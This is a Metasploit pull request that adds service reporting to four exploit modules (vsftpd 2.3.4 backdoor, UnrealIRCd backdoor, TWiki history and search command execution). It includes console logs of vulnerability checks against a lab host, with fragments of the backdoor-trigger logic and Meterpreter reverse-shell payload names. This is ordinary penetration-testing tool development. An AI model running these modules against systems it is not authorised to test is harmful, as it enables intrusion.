### PR TITLE
Add report_service()

### DIFF
--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
@@ -19,7 +20,11 @@ class MetasploitModule < Msf::Exploit::Remote
           June 30th 2011 and July 1st 2011 according to the most recent information
           available. This backdoor was removed on July 3rd 2011.
         },
-        'Author' => [ 'hdm', 'MC' ],
+        'Author' => [
+          'hdm',
+          'MC',
+          'g0tmi1k'   # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+         ],
         'License' => MSF_LICENSE,
         'References' => [
           [ 'CVE', '2011-2523' ],
@@ -60,6 +65,22 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([ Opt::RPORT(21) ])
   end
 
+  def get_banner
+    banner = sock.get_once(-1, 30).to_s
+
+    vprint_status("FTP banner: #{banner.strip}")
+    version = banner[/\((.*?)\)/, 1]
+    report_service(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: 'ftp',
+      info: "#{version}"
+    )
+
+    banner
+  end
+
   def check
     # Check for backdoor first, else exploit will fail
     vprint_status("Checking if backdoor has already been triggered (else exploit will fail)")
@@ -73,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
     connect
 
     vprint_status("Checking FTP banner")
-    banner = sock.get_once(-1, 30).to_s
+    banner = get_banner
 
     if banner.downcase.include?("vsftpd 2.3.4")
       print_status("FTP banner hints its vulnerable: #{banner.strip}")
@@ -126,8 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Without this, 220 response, rather than 331
     vprint_status("Checking FTP banner")
-    banner = sock.get_once(-1, 30).to_s
-    vprint_status("FTP banner: #{banner.strip}")
+    banner = get_banner
 
     ftp_user = "#{rand_text_alphanumeric(rand(6) + 1)}:)"
     vprint_status("Trying to log into FTP via backdoor. User: #{ftp_user}")

--- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
+++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
@@ -18,7 +19,10 @@ class MetasploitModule < Msf::Exploit::Remote
           Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
           Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
         },
-        'Author' => [ 'hdm' ],
+        'Author' => [
+          'hdm',
+          'g0tmi1k'   # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+        ],
         'License' => MSF_LICENSE,
         'References' => [
           [ 'CVE', '2010-2075' ],
@@ -64,7 +68,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def unreal_version?(response)
-    response.match?(/unreal3\.2\.8\.1/i)
+    if response =~ /unreal3\.2\.8\.1/i
+      report_service(
+        host: rhost,
+        port: rport,
+        proto: 'tcp',
+        name: 'irc',
+        info: "Unreal 3.2.8.1"
+      )
+      true
+    else
+      false
+    end
   end
 
   def send_irc_command(cmd="")

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'B4dP4nd4', # original discovery
-          'jduck' # metasploit version
+          'jduck',    # metasploit version
+          'g0tmi1k'   # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
         ],
         'License' => MSF_LICENSE,
         'References' => [
@@ -61,6 +62,28 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TWIKI_PAGE', [ true, "TWiki page to use for its history", "/view/Main/TWikiUsers" ]),
         OptInt.new('TWIKI_REVISION', [ true, 'This revision number MUST exist', 1 ])
       ]
+    )
+  end
+
+  def report_twiki_service
+    report_service(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: 'TWiki',
+      parents: {
+        name: ssl ? 'https' : 'http',
+        host: rhost,
+        port: rport,
+        proto: 'tcp',
+        parents: {
+          name: 'tcp',
+          host: rhost,
+          port: rport,
+          proto: 'tcp',
+          parents: nil
+        }
+      }
     )
   end
 
@@ -118,6 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_warning("Unable to remove test file (#{test_file})")
     end
 
+    report_twiki_service
     return Exploit::CheckCode::Vulnerable
   end
 

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           # Unknown - original discovery
-          'jduck' # metasploit version
+          'jduck',    # metasploit version
+          'g0tmi1k'   # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
         ],
         'License' => MSF_LICENSE,
         'References' => [
@@ -62,6 +63,28 @@ class MetasploitModule < Msf::Exploit::Remote
         # /search/Main/SearchResult - https://www.exploit-db.com/exploits/642
         OptString.new('SEARCH_PATH', [ true, "TWiki search directory path", "/search/Main/SearchResult" ]),
       ]
+    )
+  end
+
+  def report_twiki_service
+    report_service(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: 'TWiki',
+      parents: {
+        name: ssl ? 'https' : 'http',
+        host: rhost,
+        port: rport,
+        proto: 'tcp',
+        parents: {
+          name: 'tcp',
+          host: rhost,
+          port: rport,
+          proto: 'tcp',
+          parents: nil
+        }
+      }
     )
   end
 
@@ -115,6 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_warning("Unable to remove test file (#{test_file})")
     end
 
+    report_twiki_service
     return Exploit::CheckCode::Vulnerable
   end
 


### PR DESCRIPTION
In https://github.com/rapid7/metasploit-framework/pull/21019 @dledda-r7, suggested adding service, aka `report_service()`, as seen in https://github.com/rapid7/metasploit-framework/pull/21010. 
So I added it to all the recent MRs I did: https://github.com/rapid7/metasploit-framework/pull/20952, https://github.com/rapid7/metasploit-framework/pull/20950, https://github.com/rapid7/metasploit-framework/pull/20946 & https://github.com/rapid7/metasploit-framework/pull/20940.

- - - 

## vsftpd_234_backdoor

```console
$ msfconsole -q -x 'services -d; setg VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use vsftpd_234_backdoor;'
Services
========

host  port  proto  name  state  info  resource  parents
----  ----  -----  ----  -----  ----  --------  -------

VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  Yes    VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

[*] Using exploit/unix/ftp/vsftpd_234_backdoor
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > check
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP (User: 9Dy7cj)
[*] 10.0.0.10:21 - The target appears to be vulnerable.
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > services
Services
========

host       port  proto  name  state  info          resource  parents
----       ----  -----  ----  -----  ----          --------  -------
10.0.0.10  21    tcp    ftp   open   vsFTPd 2.3.4  {}

msf exploit(unix/ftp/vsftpd_234_backdoor) >
```

- - - 

## unreal_ircd_3281_backdoor

```console
$ msfconsole -q -x 'services -d; setg VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unreal_ircd_3281_backdoor;'
Services
========

host  port  proto  name  state  info  resource  parents
----  ----  -----  ----  -----  ----  --------  -------

VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  Yes    UnrealIRCD 3.2.8.1 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor

[*] Using exploit/unix/irc/unreal_ircd_3281_backdoor
[*] Using configured payload cmd/linux/http/x86/meterpreter/reverse_tcp
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > check
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Checking IRC banner
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 10.0.0.10:6667 - Trying to register a new IRC user: chadwick
[*] 10.0.0.10:6667 - NICK chadwick
[*] 10.0.0.10:6667 - USER chadwick 0 * chadwick
    :irc.Metasploitable.LAN 001 chadwick :Welcome to the TestIRC IRC Network chadwick!chadwick@10.0.0.1
    :irc.Metasploitable.LAN 002 chadwick :Your host is irc.Metasploitable.LAN, running version Unreal3.2.8.1
    :irc.Metasploitable.LAN 003 chadwick :This server was created Sun May 20 2012 at 14:04:37 EDT
    :irc.Metasploitable.LAN 004 chadwick irc.Metasploitable.LAN Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    :irc.Metasploitable.LAN 005 chadwick UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
    :irc.Metasploitable.LAN 005 chadwick WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=TestIRC CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
    :irc.Metasploitable.LAN 005 chadwick EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
[*] 10.0.0.10:6667 - The target appears to be vulnerable.
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > services
Services
========

host       port  proto  name  state  info            resource  parents
----       ----  -----  ----  -----  ----            --------  -------
10.0.0.10  6667  tcp    irc   open   Unreal 3.2.8.1  {}

msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
```

- - - 

## twiki_history

```console
$ msfconsole -q -x 'services -d; setg VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use twiki_history;'
Services
========

host  port  proto  name  state  info  resource  parents
----  ----  -----  ----  -----  ----  --------  -------

VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0

Matching Modules
================

   #  Name                               Disclosure Date  Rank       Check  Description
   -  ----                               ---------------  ----       -----  -----------
   0  exploit/unix/webapp/twiki_history  2005-09-14       excellent  Yes    TWiki History Function Arbitrary Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/twiki_history

[*] Using exploit/unix/webapp/twiki_history
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > check
[*] URI: /twiki/bin/view/Main/TWikiUsers?rev=1
[*] Attempting to create: /twiki/bin/euZSkkU1JBygXQ2
[*] Checking if created: /twiki/bin/euZSkkU1JBygXQ2
[*] Attempting to delete: /twiki/bin/euZSkkU1JBygXQ2
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(unix/webapp/twiki_history) >
msf exploit(unix/webapp/twiki_history) > services
Services
========

host       port  proto  name   state  info  resource  parents
----       ----  -----  ----   -----  ----  --------  -------
10.0.0.10  80    tcp    tcp    open         {}
10.0.0.10  80    tcp    twiki  open         {}        http (80/tcp)
10.0.0.10  80    tcp    http   open         {}        tcp (80/tcp)

msf exploit(unix/webapp/twiki_history) >
```

- - -

## twiki_search

```console
$ msfconsole -q -x 'services -d; db_status; setg VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use twiki_search;'
Services
========

host  port  proto  name  state  info  resource  parents
----  ----  -----  ----  -----  ----  --------  -------

[*] Connected to msf. Connection type: postgresql.
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0

Matching Modules
================

   #  Name                              Disclosure Date  Rank       Check  Description
   -  ----                              ---------------  ----       -----  -----------
   0  exploit/unix/webapp/twiki_search  2004-10-01       excellent  Yes    TWiki Search Function Arbitrary Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/twiki_search

[*] Using exploit/unix/webapp/twiki_search
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(unix/webapp/twiki_search) >
msf exploit(unix/webapp/twiki_search) > check
[*] URI: /twiki/bin/search/Main/SearchResult?search=
[*] Attempting to create: /twiki/bin/view/Main/hw7oaXM9XF2XJ
[*] Checking if created: /twiki/bin/view/Main/hw7oaXM9XF2XJ
[*] Attempting to delete: /twiki/bin/view/Main/hw7oaXM9XF2XJ
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(unix/webapp/twiki_search) >
msf exploit(unix/webapp/twiki_search) > services
Services
========

host       port  proto  name   state  info  resource  parents
----       ----  -----  ----   -----  ----  --------  -------
10.0.0.10  80    tcp    tcp    open         {}
10.0.0.10  80    tcp    twiki  open         {}        http (80/tcp)
10.0.0.10  80    tcp    http   open         {}        tcp (80/tcp)

msf exploit(unix/webapp/twiki_search) >
```
